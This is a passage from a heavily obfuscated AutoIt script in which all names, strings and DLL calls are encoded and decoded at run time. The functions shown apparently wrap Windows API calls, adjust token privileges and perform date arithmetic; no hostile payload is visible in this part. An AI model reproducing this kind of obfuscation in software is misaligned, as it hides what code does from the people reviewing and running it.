  4216.     $a3ef5d11a22 = DllStructCreate($a59f5b1111f)
  4217.     DllStructSetData($a3ef5d11a22, $a4d36712f1f, $a598f105931)
  4218.     DllStructSetData($a3ef5d11a22, $a1c36812637, $a11de601b14)
  4219.     DllStructSetData($a3ef5d11a22, $a1836915632, $a04f5e13234)
  4220.     Return $a04f5e13234
  4221. EndFunc
  4222.  
  4223. Func a13e0a0520c($a3bde203a3f, $a1a36a14b03, $a6336b11414)
  4224.     If NOT IsDeclared("SSA13E0A0520C") Then
  4225.         Global $a2536c13a08 = a2b00005424($os[3592]), $a2636d10f40 = a2b00005424($os[3593]), $a5936e1090e = a2b00005424($os[3594]), $a5036f11b1c = a2b00005424($os[3595]), $a3646012917 = a2b00005424($os[3596]), $a1246116246 = a2b00005424($os[3597])
  4226.         Global $ssa13e0a0520c = 1
  4227.     EndIf
  4228.     DllCall($a2536c13a08, $a2636d10f40, $a5936e1090e, $a5036f11b1c, $a1a36a14b03, $a3646012917, $a3bde203a3f, $a1246116246, $a6336b11414)
  4229.     If @error Then Return SetError(@error, @extended)
  4230. EndFunc
  4231.  
  4232. Func a0de0b06135(ByRef $a3ef5d11a22, $a2d46211656, $a1a36a14b03, $a11de601b14)
  4233.     If NOT IsDeclared("SSA0DE0B06135") Then
  4234.         Global $a4746310f3a = a2b00005424($os[3598]), $a4846411257 = a2b00005424($os[3599]), $a2b46514e53 = a2b00005424($os[3600]), $a5446614104 = a2b00005424($os[3601]), $a5f46712049 = a2b00005424($os[3602]), $a4946811024 = a2b00005424($os[3603]), $a2946916253 = a2b00005424($os[3604]), $a0346a13310 = a2b00005424($os[3605]), $a0846b16343 = a2b00005424($os[3606]), $a1d46c14410 = a2b00005424($os[3607]), $a4746d1273c = a2b00005424($os[3608])
  4235.         Global $ssa0de0b06135 = 1
  4236.     EndIf
  4237.     Local $a505a20190d = DllCall($a4746310f3a, $a4846411257, $a2b46514e53, $a5446614104, DllStructGetData($a3ef5d11a22, $a5f46712049), $a4946811024, $a2d46211656, $a2946916253, $a1a36a14b03, $a0346a13310, $a11de601b14, $a0846b16343, Number($a1d46c14410))
  4238.     If @error Then Return SetError(@error, @extended, False)
  4239.     Return $a505a20190d[Number($a4746d1273c)]
  4240. EndFunc
  4241.  
  4242. Func a43e0c05a5b(ByRef $a3ef5d11a22, $a2d46211656, $a1a36a14b03 = 0, $a11de601b14 = 0, $a5f46e11d1d = "struct*")
  4243.     If NOT IsDeclared("SSA43E0C05A5B") Then
  4244.         Global $a3c46f1565f = a2b00005424($os[3609]), $a0e56015c51 = a2b00005424($os[3610]), $a3456116050 = a2b00005424($os[3611]), $a1556212304 = a2b00005424($os[3612]), $a2256310a62 = a2b00005424($os[3613]), $a2d56410f0c = a2b00005424($os[3614]), $a4156513c3a = a2b00005424($os[3615]), $a3e5661461a = a2b00005424($os[3616]), $a0556715049 = a2b00005424($os[3617]), $a5e56811547 = a2b00005424($os[3618]), $a055691162b = a2b00005424($os[3619]), $a5156a11b5f = a2b00005424($os[3620]), $a0b56b1114b = a2b00005424($os[3621]), $a6356c13e58 = a2b00005424($os[3622])
  4245.         Global $ssa43e0c05a5b = 1
  4246.     EndIf
  4247.     If $a1a36a14b03 = Number($a3c46f1565f) Then $a1a36a14b03 = DllStructGetData($a3ef5d11a22, $a0e56015c51)
  4248.     If $a11de601b14 = Number($a3456116050) Then $a11de601b14 = DllStructGetData($a3ef5d11a22, $a1556212304)
  4249.     Local $a505a20190d = DllCall($a2256310a62, $a2d56410f0c, $a4156513c3a, $a3e5661461a, DllStructGetData($a3ef5d11a22, $a0556715049), $a5e56811547, $a1a36a14b03, $a5f46e11d1d, $a2d46211656, $a055691162b, $a11de601b14, $a5156a11b5f, Number($a0b56b1114b))
  4250.     If @error Then Return SetError(@error, @extended, False)
  4251.     Return $a505a20190d[Number($a6356c13e58)]
  4252. EndFunc
  4253.  
  4254. Func a3ae0d0052f($a1c56d10c44, $a11de601b14, $a6356e14e21, $a3856f15215)
  4255.     If NOT IsDeclared("SSA3AE0D0052F") Then
  4256.         Global $a2566012340 = a2b00005424($os[3623]), $a196611241f = a2b00005424($os[3624]), $a6166214e2d = a2b00005424($os[3625]), $a0666316352 = a2b00005424($os[3626]), $a4a66410521 = a2b00005424($os[3627]), $a1566515b2a = a2b00005424($os[3628]), $a1a66611244 = a2b00005424($os[3629]), $a4b6671612d = a2b00005424($os[3630]), $a5466811323 = a2b00005424($os[3631])
  4257.         Global $ssa3ae0d0052f = 1
  4258.     EndIf
  4259.     Local $a505a20190d = DllCall($a2566012340, $a196611241f, $a6166214e2d, $a0666316352, $a1c56d10c44, $a4a66410521, $a11de601b14, $a1566515b2a, $a6356e14e21, $a1a66611244, $a3856f15215)
  4260.     If @error Then Return SetError(@error, @extended, Number($a4b6671612d))
  4261.     Return $a505a20190d[Number($a5466811323)]
  4262. EndFunc
  4263.  
  4264. Func a1fe0e00007($a598f105931, $a1c56d10c44, $a11de601b14, $a6356e14e21, $a3856f15215)
  4265.     If NOT IsDeclared("SSA1FE0E00007") Then
  4266.         Global $a3766913e57 = a2b00005424($os[3632]), $a3366a15530 = a2b00005424($os[3633]), $a2b66b12359 = a2b00005424($os[3634]), $a3e66c14e60 = a2b00005424($os[3635]), $a1166d11837 = a2b00005424($os[3636]), $a5a66e13b4a = a2b00005424($os[3637]), $a3c66f1331d = a2b00005424($os[3638]), $a537601044a = a2b00005424($os[3639]), $a0676110c1f = a2b00005424($os[3640]), $a287621570f = a2b00005424($os[3641])
  4267.         Global $ssa1fe0e00007 = 1
  4268.     EndIf
  4269.     Local $a505a20190d = DllCall($a3766913e57, $a3366a15530, $a2b66b12359, $a3e66c14e60, $a598f105931, $a1166d11837, $a1c56d10c44, $a5a66e13b4a, $a11de601b14, $a3c66f1331d, $a6356e14e21, $a537601044a, $a3856f15215)
  4270.     If @error Then Return SetError(@error, @extended, Number($a0676110c1f))
  4271.     Return $a505a20190d[Number($a287621570f)]
  4272. EndFunc
  4273.  
  4274. Func a56e0f0562c($a1c56d10c44, $a11de601b14, $a607631563e)
  4275.     If NOT IsDeclared("SSA56E0F0562C") Then
  4276.         Global $a5e76414a00 = a2b00005424($os[3642]), $a4876513747 = a2b00005424($os[3643]), $a1776611a5a = a2b00005424($os[3644]), $a4f76712d12 = a2b00005424($os[3645]), $a147681125a = a2b00005424($os[3646]), $a2076915457 = a2b00005424($os[3647]), $a5176a15f2d = a2b00005424($os[3648])
  4277.         Global $ssa56e0f0562c = 1
  4278.     EndIf
  4279.     Local $a505a20190d = DllCall($a5e76414a00, $a4876513747, $a1776611a5a, $a4f76712d12, $a1c56d10c44, $a147681125a, $a11de601b14, $a2076915457, $a607631563e)
  4280.     If @error Then Return SetError(@error, @extended, False)
  4281.     Return $a505a20190d[Number($a5176a15f2d)]
  4282. EndFunc
  4283.  
  4284. Func a2ef0003b42($a598f105931, $a1c56d10c44, $a11de601b14, $a607631563e)
  4285.     If NOT IsDeclared("SSA2EF0003B42") Then
  4286.         Global $a1376b1104c = a2b00005424($os[3649]), $a3876c13f58 = a2b00005424($os[3650]), $a4876d13317 = a2b00005424($os[3651]), $a6276e15427 = a2b00005424($os[3652]), $a5c76f14421 = a2b00005424($os[3653]), $a2586012821 = a2b00005424($os[3654]), $a2b86113c23 = a2b00005424($os[3655]), $a4186210418 = a2b00005424($os[3656])
  4287.         Global $ssa2ef0003b42 = 1
  4288.     EndIf
  4289.     Local $a505a20190d = DllCall($a1376b1104c, $a3876c13f58, $a4876d13317, $a6276e15427, $a598f105931, $a5c76f14421, $a1c56d10c44, $a2586012821, $a11de601b14, $a2b86113c23, $a607631563e)
  4290.     If @error Then Return SetError(@error, @extended, False)
  4291.     Return $a505a20190d[Number($a4186210418)]
  4292. EndFunc
  4293.  
  4294. Func a63f0101354($a49cc60131c, $a0f2df01952, $a62cbf0122a, $a5d72c10e58 = False)
  4295.     If NOT IsDeclared("SSA63F0101354") Then
  4296.         Global $a5986313055 = a2b00005424($os[3657]), $a5786410402 = a2b00005424($os[3658]), $a4c86511a0e = a2b00005424($os[3659]), $a0986614228 = a2b00005424($os[3660]), $a3286710823 = a2b00005424($os[3661]), $a1d8681435c = a2b00005424($os[3662]), $a5586912303 = a2b00005424($os[3663]), $a0b86a1230d = a2b00005424($os[3664]), $a3b86b15b53 = a2b00005424($os[3665]), $a5f86c11251 = a2b00005424($os[3666]), $a0d86d1013e = a2b00005424($os[3667]), $a5d86e14562 = a2b00005424($os[3668]), $a1286f11224 = a2b00005424($os[3669]), $a1f9601224f = a2b00005424($os[3670]), $a3a9611132c = a2b00005424($os[3671]), $a389621094c = a2b00005424($os[3672]), $a039631203b = a2b00005424($os[3673]), $a1d96413141 = a2b00005424($os[3674]), $a4896510807 = a2b00005424($os[3675]), $a1f96614408 = a2b00005424($os[3676]), $a4a96713d06 = a2b00005424($os[3677]), $a4b96810b08 = a2b00005424($os[3678]), $a2096914e4d = a2b00005424($os[3679]), $a6196a11d00 = a2b00005424($os[3680]), $a3d96b15162 = a2b00005424($os[3681]), $a3296c10056 = a2b00005424($os[3682])
  4297.         Global $ssa63f0101354 = 1
  4298.     EndIf
  4299.     Local $a505a20190d = DllCall($a5986313055, $a5786410402, $a4c86511a0e, $a0986614228, $a49cc60131c, $a3286710823, $a0f2df01952, $a1d8681435c, $a62cbf0122a)
  4300.     If @error Then Return SetError(@error, @extended, Number($a5586912303))
  4301.     If $a505a20190d[Number($a0b86a1230d)] Then Return $a505a20190d[Number($a3b86b15b53)]
  4302.     If NOT $a5d72c10e58 Then Return Number($a5f86c11251)
  4303.     Local $a5082710732 = a0bd0d04a04(BitOR($a09c9804f35, $a17c9401a48))
  4304.     If @error Then Return SetError(@error, @extended, Number($a0d86d1013e))
  4305.     a2fd0e03a10($a5082710732, $a5d86e14562, True)
  4306.     Local $a3182a1024a = @error
  4307.     Local $a4382b16262 = @extended
  4308.     Local $a0182c13d56 = Number($a1286f11224)
  4309.     If NOT @error Then
  4310.         $a505a20190d = DllCall($a1f9601224f, $a3a9611132c, $a389621094c, $a039631203b, $a49cc60131c, $a1d96413141, $a0f2df01952, $a4896510807, $a62cbf0122a)
  4311.         $a3182a1024a = @error
  4312.         $a4382b16262 = @extended
  4313.         If $a505a20190d[Number($a1f96614408)] Then $a0182c13d56 = $a505a20190d[Number($a4a96713d06)]
  4314.         a2fd0e03a10($a5082710732, $a4b96810b08, False)
  4315.         If @error Then
  4316.             $a3182a1024a = @error
  4317.             $a4382b16262 = @extended
  4318.         EndIf
  4319.     EndIf
  4320.     DllCall($a2096914e4d, $a6196a11d00, $a3d96b15162, $a3296c10056, $a5082710732)
  4321.     Return SetError($a3182a1024a, $a4382b16262, $a0182c13d56)
  4322. EndFunc
  4323.  
  4324. Func a59f020394e($a4896d15e31, $a4196e14a55, $a5396f10f24)
  4325.     If NOT IsDeclared("SSA59F020394E") Then
  4326.         Global $a60a6115c3b = a2b00005424($os[3683]), $a2da6310f2b = a2b00005424($os[3684]), $a28a6512d43 = a2b00005424($os[3685]), $a56a661114b = a2b00005424($os[3686]), $a55a6711a2f = a2b00005424($os[3687]), $a3aa6816355 = a2b00005424($os[3688]), $a33a691013b = a2b00005424($os[3689]), $a1da6a14104 = a2b00005424($os[3690]), $a31a6b14b02 = a2b00005424($os[3691]), $a07a6c1280d = a2b00005424($os[3692]), $a31a6d16116 = a2b00005424($os[3693]), $a14a6e13663 = a2b00005424($os[3694]), $a35a6f1481c = a2b00005424($os[3695]), $a11b6014a53 = a2b00005424($os[3696]), $a3bb6113a2d = a2b00005424($os[3697]), $a58b6215e06 = a2b00005424($os[3698]), $a38b6312f04 = a2b00005424($os[3699]), $a2eb6415a37 = a2b00005424($os[3700]), $a33b6514e1c = a2b00005424($os[3701]), $a46b6610620 = a2b00005424($os[3702]), $a24b671503b = a2b00005424($os[3703]), $a36b6813f25 = a2b00005424($os[3704]), $a57b691573c = a2b00005424($os[3705]), $a20b6a1282d = a2b00005424($os[3706]), $a20b6b15d63 = a2b00005424($os[3707]), $a54b6c12b40 = a2b00005424($os[3708]), $a58b6d13955 = a2b00005424($os[3709]), $a0fb6e13810 = a2b00005424($os[3710]), $a4bb6f12c5a = a2b00005424($os[3711]), $a1ec6011a60 = a2b00005424($os[3712]), $a62c611431e = a2b00005424($os[3713]), $a44c6215b5c = a2b00005424($os[3714]), $a00c6312735 = a2b00005424($os[3715]), $a33c641544a = a2b00005424($os[3716]), $a11c651612e = a2b00005424($os[3717]), $a0fc6611221 = a2b00005424($os[3718]), $a60c6716337 = a2b00005424($os[3719]), $a1bc6814360 = a2b00005424($os[3720]), $a24c6916310 = a2b00005424($os[3721]), $a31c6a10329 = a2b00005424($os[3722]), $a2ac6b14947 = a2b00005424($os[3723]), $a3cc6c10317 = a2b00005424($os[3724]), $a54c6d15662 = a2b00005424($os[3725]), $a5bc6e12b55 = a2b00005424($os[3726]), $a0ec6f1075a = a2b00005424($os[3727]), $a59d6012b05 = a2b00005424($os[3728]), $a61d6110b1d = a2b00005424($os[3729]), $a02d6215a4c = a2b00005424($os[3730]), $a25d6314049 = a2b00005424($os[3731]), $a47d6515705 = a2b00005424($os[3732]), $a41d6612608 = a2b00005424($os[3733]), $a24d6713133 = a2b00005424($os[3734]), $a09d6813d1b = a2b00005424($os[3735])
  4327.         Global $a47d6914601 = a2b00005424($os[3736]), $a39d6a14e11 = a2b00005424($os[3737]), $a43d6b12c4e = a2b00005424($os[3738]), $a2ad6c15b38 = a2b00005424($os[3739]), $a17d6d11d33 = a2b00005424($os[3740]), $a3ed6f14338 = a2b00005424($os[3741]), $a27e6012241 = a2b00005424($os[3742]), $a49e6112835 = a2b00005424($os[3743]), $a60e6214705 = a2b00005424($os[3744]), $a1ce6314b50 = a2b00005424($os[3745]), $a24e6415702 = a2b00005424($os[3746]), $a37e651125c = a2b00005424($os[3747]), $a02e6613163 = a2b00005424($os[3748]), $a48e6713e5f = a2b00005424($os[3749]), $a2ce681521f = a2b00005424($os[3750]), $a23e6914949 = a2b00005424($os[3751]), $a54e6a15345 = a2b00005424($os[3752]), $a50e6b1532b = a2b00005424($os[3753]), $a38e6c15420 = a2b00005424($os[3754]), $a15e6d10a19 = a2b00005424($os[3755]), $a24e6e1015d = a2b00005424($os[3756]), $a34e6f12d4b = a2b00005424($os[3757]), $a14f6013706 = a2b00005424($os[3758]), $a12f611562c = a2b00005424($os[3759]), $a34f621003c = a2b00005424($os[3760]), $a11f6310703 = a2b00005424($os[3761]), $a33f6511822 = a2b00005424($os[3762]), $a22f6613861 = a2b00005424($os[3763]), $a17f6715752 = a2b00005424($os[3764]), $a44f6810c49 = a2b00005424($os[3765]), $a5af6911142 = a2b00005424($os[3766]), $a03f6a13a55 = a2b00005424($os[3767]), $a0bf6b1042a = a2b00005424($os[3768]), $a47f6c12f47 = a2b00005424($os[3769]), $a3af6d1450f = a2b00005424($os[3770]), $a2af6e10710 = a2b00005424($os[3771]), $a14f6f13e01 = a2b00005424($os[3772]), $a5707014f09 = a2b00005424($os[3773]), $a5d0711000b = a2b00005424($os[3774]), $a2a07214b61 = a2b00005424($os[3775]), $a1b07312725 = a2b00005424($os[3776]), $a540741154e = a2b00005424($os[3777]), $a1907511a4a = a2b00005424($os[3778]), $a0807614b1d = a2b00005424($os[3779]), $a210771580d = a2b00005424($os[3780]), $a2107810040 = a2b00005424($os[3781]), $a1707913f43 = a2b00005424($os[3782]), $a3707a16059 = a2b00005424($os[3783]), $a5807b11f18 = a2b00005424($os[3784]), $a4107c10235 = a2b00005424($os[3785]), $a5107d1370e = a2b00005424($os[3786]), $a2207e15204 = a2b00005424($os[3787]), $a5e07f13321 = a2b00005424($os[3788])
  4328.         Global $a1117011800 = a2b00005424($os[3789]), $a511711613c = a2b00005424($os[3790]), $a3a1721110f = a2b00005424($os[3791]), $a3f17310b14 = a2b00005424($os[3792]), $a4b1741524b = a2b00005424($os[3793]), $a0717511e2a = a2b00005424($os[3794]), $a5817612621 = a2b00005424($os[3795]), $a5a17712b31 = a2b00005424($os[3796]), $a5817812417 = a2b00005424($os[3797]), $a3d17912430 = a2b00005424($os[3798]), $a1417a13134 = a2b00005424($os[3799])
  4329.         Global $ssa59f020394e = 1
  4330.     EndIf
  4331.     Local $a33a6015e4e[Number($a60a6115c3b)]
  4332.     Local $a5ea6213a32[Number($a2da6310f2b)]
  4333.     Local $a0ba6413d49
  4334.     $a4896d15e31 = StringLeft($a4896d15e31, Number($a28a6512d43))
  4335.     If StringInStr($a56a661114b, $a4896d15e31) = Number($a55a6711a2f) OR $a4896d15e31 = "" Then
  4336.         Return SetError(Number($a3aa6816355), Number($a33a691013b), Number($a1da6a14104))
  4337.     EndIf
  4338.     If NOT StringIsInt($a4196e14a55) Then
  4339.         Return SetError(Number($a31a6b14b02), Number($a07a6c1280d), Number($a31a6d16116))
  4340.     EndIf
  4341.     If NOT a3cf0800a58($a5396f10f24) Then
  4342.         Return SetError(Number($a14a6e13663), Number($a35a6f1481c), Number($a11b6014a53))
  4343.     EndIf
  4344.     a2201103e38($a5396f10f24, $a5ea6213a32, $a33a6015e4e)
  4345.     If $a4896d15e31 = $a3bb6113a2d OR $a4896d15e31 = $a58b6215e06 Then
  4346.         If $a4896d15e31 = $a38b6312f04 Then $a4196e14a55 = $a4196e14a55 * Number($a2eb6415a37)
  4347.         $a0ba6413d49 = a620140274d($a5ea6213a32[Number($a33b6514e1c)], $a5ea6213a32[Number($a46b6610620)], $a5ea6213a32[Number($a24b671503b)]) + $a4196e14a55
  4348.         a5801604f08($a0ba6413d49, $a5ea6213a32[Number($a36b6813f25)], $a5ea6213a32[Number($a57b691573c)], $a5ea6213a32[Number($a20b6a1282d)])
  4349.     EndIf
  4350.     If $a4896d15e31 = $a20b6b15d63 Then
  4351.         $a5ea6213a32[Number($a54b6c12b40)] = $a5ea6213a32[Number($a58b6d13955)] + $a4196e14a55
  4352.         While $a5ea6213a32[Number($a0fb6e13810)] > Number($a4bb6f12c5a)
  4353.             $a5ea6213a32[Number($a1ec6011a60)] = $a5ea6213a32[Number($a62c611431e)] - Number($a44c6215b5c)
  4354.             $a5ea6213a32[Number($a00c6312735)] = $a5ea6213a32[Number($a33c641544a)] + Number($a11c651612e)
  4355.         WEnd
  4356.         While $a5ea6213a32[Number($a0fc6611221)] < Number($a60c6716337)
  4357.             $a5ea6213a32[Number($a1bc6814360)] = $a5ea6213a32[Number($a24c6916310)] + Number($a31c6a10329)
  4358.             $a5ea6213a32[Number($a2ac6b14947)] = $a5ea6213a32[Number($a3cc6c10317)] - Number($a54c6d15662)
  4359.         WEnd
  4360.     EndIf
  4361.     If $a4896d15e31 = $a5bc6e12b55 Then
  4362.         $a5ea6213a32[Number($a0ec6f1075a)] = $a5ea6213a32[Number($a59d6012b05)] + $a4196e14a55
  4363.     EndIf
  4364.     If $a4896d15e31 = $a61d6110b1d OR $a4896d15e31 = $a02d6215a4c OR $a4896d15e31 = $a25d6314049 Then
  4365.         Local $a14d6414915 = a4211102e3f($a33a6015e4e[Number($a47d6515705)], $a33a6015e4e[Number($a41d6612608)], $a33a6015e4e[Number($a24d6713133)]) / Number($a09d6813d1b)
  4366.         If $a4896d15e31 = $a47d6914601 Then $a14d6414915 = $a14d6414915 + $a4196e14a55 * Number($a39d6a14e11)
  4367.         If $a4896d15e31 = $a43d6b12c4e Then $a14d6414915 = $a14d6414915 + $a4196e14a55 * Number($a2ad6c15b38)
  4368.         If $a4896d15e31 = $a17d6d11d33 Then $a14d6414915 = $a14d6414915 + $a4196e14a55
  4369.         Local $a27d6e12008 = Int($a14d6414915 / (Number($a3ed6f14338) * Number($a27e6012241) * Number($a49e6112835)))
  4370.         $a14d6414915 = $a14d6414915 - $a27d6e12008 * Number($a60e6214705) * Number($a1ce6314b50) * Number($a24e6415702)
  4371.         If $a14d6414915 < Number($a37e651125c) Then
  4372.             $a27d6e12008 = $a27d6e12008 - Number($a02e6613163)
  4373.             $a14d6414915 = $a14d6414915 + Number($a48e6713e5f) * Number($a2ce681521f) * Number($a23e6914949)
  4374.         EndIf
  4375.         $a0ba6413d49 = a620140274d($a5ea6213a32[Number($a54e6a15345)], $a5ea6213a32[Number($a50e6b1532b)], $a5ea6213a32[Number($a38e6c15420)]) + $a27d6e12008
  4376.         a5801604f08($a0ba6413d49, $a5ea6213a32[Number($a15e6d10a19)], $a5ea6213a32[Number($a24e6e1015d)], $a5ea6213a32[Number($a34e6f12d4b)])
  4377.         a3a1100102f($a14d6414915 * Number($a14f6013706), $a33a6015e4e[Number($a12f611562c)], $a33a6015e4e[Number($a34f621003c)], $a33a6015e4e[Number($a11f6310703)])
  4378.     EndIf
  4379.     Local $a3ff6412b1b = a631140382e($a5ea6213a32[Number($a33f6511822)])
  4380.     If $a3ff6412b1b[$a5ea6213a32[Number($a22f6613861)]] < $a5ea6213a32[Number($a17f6715752)] Then $a5ea6213a32[Number($a44f6810c49)] = $a3ff6412b1b[$a5ea6213a32[Number($a5af6911142)]]
  4381.     $a5396f10f24 = $a5ea6213a32[Number($a03f6a13a55)] & $a0bf6b1042a & StringRight($a47f6c12f47 & $a5ea6213a32[Number($a3af6d1450f)], Number($a2af6e10710)) & $a14f6f13e01 & StringRight($a5707014f09 & $a5ea6213a32[Number($a5d0711000b)], Number($a2a07214b61))
  4382.     If $a33a6015e4e[Number($a1b07312725)] > Number($a540741154e) Then
  4383.         If $a33a6015e4e[Number($a1907511a4a)] > Number($a0807614b1d) Then
  4384.             $a5396f10f24 = $a5396f10f24 & $a210771580d & StringRight($a2107810040 & $a33a6015e4e[Number($a1707913f43)], Number($a3707a16059)) & $a5807b11f18 & StringRight($a4107c10235 & $a33a6015e4e[Number($a5107d1370e)], Number($a2207e15204)) & $a5e07f13321 & StringRight($a1117011800 & $a33a6015e4e[Number($a511711613c)], Number($a3a1721110f))
  4385.         Else
  4386.             $a5396f10f24 = $a5396f10f24 & $a3f17310b14 & StringRight($a4b1741524b & $a33a6015e4e[Number($a0717511e2a)], Number($a5817612621)) & $a5a17712b31 & StringRight($a5817812417 & $a33a6015e4e[Number($a3d17912430)], Number($a1417a13134))
  4387.         EndIf
  4388.     EndIf
  4389.     Return ($a5396f10f24)
  4390. EndFunc
  4391.  
  4392. Func a35f0300454($a2b17b13930, $a3f17c14204 = 0)
  4393.     If NOT IsDeclared("SSA35F0300454") Then
  4394.         Global $a4b17e13561 = a2b00005424($os[3800]), $a0417f15509 = a2b00005424($os[3801]), $a3e27014628 = a2b00005424($os[3802]), $a5627113d02 = a2b00005424($os[3803]), $a6227212a3a = a2b00005424($os[3804]), $a1d27311941 = a2b00005424($os[3805]), $a3627415c50 = a2b00005424($os[3806]), $a3227511823 = a2b00005424($os[3807]), $a6327610641 = a2b00005424($os[3808]), $a4327710e21 = a2b00005424($os[3809]), $a2f2781213c = a2b00005424($os[3810]), $a1b27914023 = a2b00005424($os[3811]), $a5527a1174f = a2b00005424($os[3812]), $a4527b13c1d = a2b00005424($os[3813]), $a5c27c1572d = a2b00005424($os[3814]), $a1027d1192f = a2b00005424($os[3815]), $a2f27e13816 = a2b00005424($os[3816]), $a3e27f1220c = a2b00005424($os[3817]), $a1137012762 = a2b00005424($os[3818])
  4395.         Global $ssa35f0300454 = 1
  4396.     EndIf
  4397.     Local Const $a2017d15f5f[Number($a4b17e13561)] = ["", $a0417f15509, $a3e27014628, $a5627113d02, $a6227212a3a, $a1d27311941, $a3627415c50, $a3227511823]
  4398.     Select
  4399.         Case NOT StringIsInt($a2b17b13930) OR NOT StringIsInt($a3f17c14204)
  4400.             Return SetError(Number($a6327610641), Number($a4327710e21), "")
  4401.         Case $a2b17b13930 < Number($a2f2781213c) OR $a2b17b13930 > Number($a1b27914023)
  4402.             Return SetError(Number($a5527a1174f), Number($a4527b13c1d), "")
  4403.         Case Else
  4404.             Select
  4405.                 Case $a3f17c14204 = Number($a5c27c1572d)
  4406.                     Return $a2017d15f5f[$a2b17b13930]
  4407.                 Case $a3f17c14204 = Number($a1027d1192f)
  4408.                     Return StringLeft($a2017d15f5f[$a2b17b13930], Number($a2f27e13816))
  4409.                 Case Else
  4410.                     Return SetError(Number($a3e27f1220c), Number($a1137012762), "")
  4411.             EndSelect
  4412.     EndSelect
  4413. EndFunc
  4414.  
  4415. Func a22f0405e0e($a4c37114838, $a3f3721131a)
  4416.     If NOT IsDeclared("SSA22F0405E0E") Then
  4417.         Global $a5037411e0c = a2b00005424($os[3819]), $a2437513c24 = a2b00005424($os[3820]), $a0937611623 = a2b00005424($os[3821])
  4418.         Global $ssa22f0405e0e = 1
  4419.     EndIf
  4420.     If a2ef070520b($a3f3721131a) AND a36f0903f13($a4c37114838) Then
  4421.         Local $a1937314559 = a631140382e($a4c37114838)
  4422.         Return $a1937314559[$a3f3721131a]
  4423.     EndIf
  4424.     Return SetError(Number($a5037411e0c), Number($a2437513c24), Number($a0937611623))
  4425. EndFunc
  4426.  
  4427. Func a1ff050331d($a4896d15e31, $a0637713410, $a2c3781103b)
  4428.     If NOT IsDeclared("SSA1FF050331D") Then
  4429.         Global $a0137911a60 = a2b00005424($os[3822]), $a1037a12422 = a2b00005424($os[3823]), $a4037b13f33 = a2b00005424($os[3824]), $a6037c14c0f = a2b00005424($os[3825]), $a6137d12716 = a2b00005424($os[3826]), $a0937e15b35 = a2b00005424($os[3827]), $a0937f14011 = a2b00005424($os[3828]), $a0947011238 = a2b00005424($os[3829]), $a5c47113b33 = a2b00005424($os[3830]), $a5547211229 = a2b00005424($os[3831]), $a4c47313a32 = a2b00005424($os[3832]), $a284741492a = a2b00005424($os[3833]), $a3d47615f09 = a2b00005424($os[3834]), $a2a47815927 = a2b00005424($os[3835]), $a3747a11a37 = a2b00005424($os[3836]), $a5747c12647 = a2b00005424($os[3837]), $a0f47e14330 = a2b00005424($os[3838]), $a1047f1315f = a2b00005424($os[3839]), $a4157015d22 = a2b00005424($os[3840]), $a3e57112600 = a2b00005424($os[3841]), $a575721524b = a2b00005424($os[3842]), $a3c57310833 = a2b00005424($os[3843]), $a0d57812621 = a2b00005424($os[3844]), $a1257910b48 = a2b00005424($os[3845]), $a3f57a14b5e = a2b00005424($os[3846]), $a3957b10b5f = a2b00005424($os[3847]), $a5757c1271e = a2b00005424($os[3848]), $a1157d1123b = a2b00005424($os[3849]), $a1c57e10521 = a2b00005424($os[3850]), $a4257f12859 = a2b00005424($os[3851]), $a2e67011f5c = a2b00005424($os[3852]), $a4e67113614 = a2b00005424($os[3853]), $a0f67213220 = a2b00005424($os[3854]), $a4967310b27 = a2b00005424($os[3855]), $a5667416310 = a2b00005424($os[3856]), $a1d67513e61 = a2b00005424($os[3857]), $a3967610b0c = a2b00005424($os[3858]), $a4c6771504c = a2b00005424($os[3859]), $a576781383f = a2b00005424($os[3860]), $a0467915852 = a2b00005424($os[3861]), $a2967a14528 = a2b00005424($os[3862]), $a1667b1315d = a2b00005424($os[3863]), $a5f67c11a4b = a2b00005424($os[3864]), $a0967d1610e = a2b00005424($os[3865]), $a5867e1511a = a2b00005424($os[3866]), $a2267f14f55 = a2b00005424($os[3867]), $a1777110e1e = a2b00005424($os[3868]), $a1177210737 = a2b00005424($os[3869]), $a2a77315b19 = a2b00005424($os[3870]), $a1e77413203 = a2b00005424($os[3871]), $a2a77515b29 = a2b00005424($os[3872]), $a3377613f5d = a2b00005424($os[3873]), $a4977714412 = a2b00005424($os[3874])
  4430.         Global $a4a77811160 = a2b00005424($os[3875]), $a147791530e = a2b00005424($os[3876]), $a2777a1013e = a2b00005424($os[3877]), $a3b77b10d52 = a2b00005424($os[3878]), $a1077c1304c = a2b00005424($os[3879]), $a0f77d12739 = a2b00005424($os[3880]), $a0277e12f2e = a2b00005424($os[3881]), $a3077f11629 = a2b00005424($os[3882]), $a5687015649 = a2b00005424($os[3883]), $a0b87114921 = a2b00005424($os[3884]), $a0687215717 = a2b00005424($os[3885]), $a3387311f50 = a2b00005424($os[3886]), $a1c8741161b = a2b00005424($os[3887]), $a0487510139 = a2b00005424($os[3888]), $a018761450b = a2b00005424($os[3889]), $a5787713a2d = a2b00005424($os[3890]), $a3187810e51 = a2b00005424($os[3891]), $a2987914a63 = a2b00005424($os[3892]), $a4387a13621 = a2b00005424($os[3893]), $a3687b14700 = a2b00005424($os[3894]), $a1d87c10840 = a2b00005424($os[3895]), $a4187d14731 = a2b00005424($os[3896]), $a4387e15055 = a2b00005424($os[3897]), $a3787f1462e = a2b00005424($os[3898]), $a0997011254 = a2b00005424($os[3899]), $a2f97113a23 = a2b00005424($os[3900]), $a469721201d = a2b00005424($os[3901]), $a1597313d25 = a2b00005424($os[3902]), $a2197412c62 = a2b00005424($os[3903]), $a4097515547 = a2b00005424($os[3904]), $a0797613d12 = a2b00005424($os[3905]), $a3a97716031 = a2b00005424($os[3906]), $a3c97811d08 = a2b00005424($os[3907]), $a049791055e = a2b00005424($os[3908]), $a4697a1461a = a2b00005424($os[3909]), $a1397b15a06 = a2b00005424($os[3910]), $a4997c11b3d = a2b00005424($os[3911]), $a0997d11e0a = a2b00005424($os[3912]), $a5097e13113 = a2b00005424($os[3913]), $a5f97f10121 = a2b00005424($os[3914]), $a61a7011c5e = a2b00005424($os[3915]), $a3da7110c5a = a2b00005424($os[3916]), $a50a721601e = a2b00005424($os[3917]), $a44a731013e = a2b00005424($os[3918]), $a02a741292b = a2b00005424($os[3919]), $a26a751443d = a2b00005424($os[3920]), $a3ea761515f = a2b00005424($os[3921]), $a62a771322c = a2b00005424($os[3922]), $a13a7815a05 = a2b00005424($os[3923]), $a2fa791502b = a2b00005424($os[3924]), $a5aa7a10349 = a2b00005424($os[3925]), $a58a7b1015d = a2b00005424($os[3926]), $a12a7c11b00 = a2b00005424($os[3927])
  4431.         Global $ssa1ff050331d = 1
